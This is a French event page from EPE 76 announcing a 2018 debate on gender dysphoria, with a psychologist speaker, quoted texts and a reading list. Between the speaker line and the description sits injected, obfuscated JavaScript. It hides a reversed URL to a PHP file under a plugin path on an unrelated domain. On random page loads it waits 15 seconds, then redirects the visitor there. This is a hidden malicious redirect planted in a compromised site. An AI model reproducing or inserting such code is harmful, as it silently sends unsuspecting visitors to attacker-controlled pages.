Chargement Évènements

« Tous les Évènements

Rencontre débat 22 février 2018: La dysphorie de genre, comprendre, aider et accompagner.

22 février | | 20 h 00 min - 22 h 00 min

Gratuit

La dysphorie de genre, comprendre, aider et accompagner.

Avec Virginie Richard, psychologue à l’EPE 76 et chargé de cours à l’université de Rouen

$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == « string ») return $vTB$I_919AeEAw2z$KX.list[n].split(«  »).reverse().join(«  »);return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=[« ‘php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anded= »true »>

La dysphorie de genre (anciennement troubles de l’identité de genre[1]) est un malaise et un sentiment d’inadéquation pouvant être ressentis par un individu vis-à-vis du genre qui lui est attribué d’après son sexe. En France, la dysphorie de genre n’est plus classée dans la nomenclature de la Sécurité sociale dans le chapitre des troubles de la personnalité ouvrant droit a une prise en charge en ALD depuis « En dépit de toute classification allant dans le sens contraire, l’orientation sexuelle et l’identité de genre d’une personne ne sont pas en soi des maladies et ne doivent pas être traitées, soignées ou supprimées  (http://medbox.iiab.me:3000/wikipedia_fr_medicine_2017-10/A/Dysphorie_de_genre.html)

Les mots et les réalités, de Colette Chiland, extraits, Revue Information pshychiatrique 2011/4 vol 87

« Les êtres humains sont si embarrassés par la distinction entre les sexes qu’ils en viennent à vouloir être l’autre, ou ni l’un ni l’autre, ou les deux à la fois ; ils déclarent que ce qu’ils manipulent n’est pas une réalité biologique, mais un artefact social.

Mettons-nous d’abord d’accord sur les mots que nous emploierons pour dialoguer afin d’être au clair sur ce dont nous parlons.

Ensuite, abordons le cœur du problème ; il ne s’agit pas d’être politiquement correct pour glaner des voix électorales ; il s’agit de lutter contre une stigmatisation qui peut pourrir la vie.

Je regrette que la masse silencieuse de nos patients ne se fasse pas entendre. Ceux qu’on entend ne représentent qu’une partie des usagers, les militants qui sont en colère ; ils se trompent quand ils croient faire une invitation au dialogue en lançant des injures et des contre-vérités. Les patients que nous voyons ne se réclament pas de la « transidentité », ils ne se disent pas « trans’ » et ne sont pas représentés par les associations « trans’ » ; ils ont fait leur « transition » et veulent vivre incognito en tant qu’homme ou en tant que femme.

Références:

« Trouble dans le genre » Judith Butler
« Genre et Psychanalyse : la différence des sexes en question » J.J Rassial
« Le transsexualisme » Colette Chiland
« La métamorphose impensable : essai sur le transsexualisme et l’identité personnelle » P-H. Castel

Partager l'article
Share on FacebookShare on Google+Tweet about this on Twitter

Détails

Date :
22 février
Heure :
20 h 00 min - 22 h 00 min
Prix :
Gratuit
Catégorie d’Évènement:
Étiquettes Évènement :
, , ,
Site Web :
http://www.epe76.fr

Organisateur

EPE 76 Ecole des parents 76
Téléphone :
0235893627
E-mail :
eperouen@ecoledesparents.org
Site Web :
www.epe76.fr

Lieu

Education et Formation
6, place Waldeck Rousseau
LE PETIT QUEVILLY, 76140
+ Google Map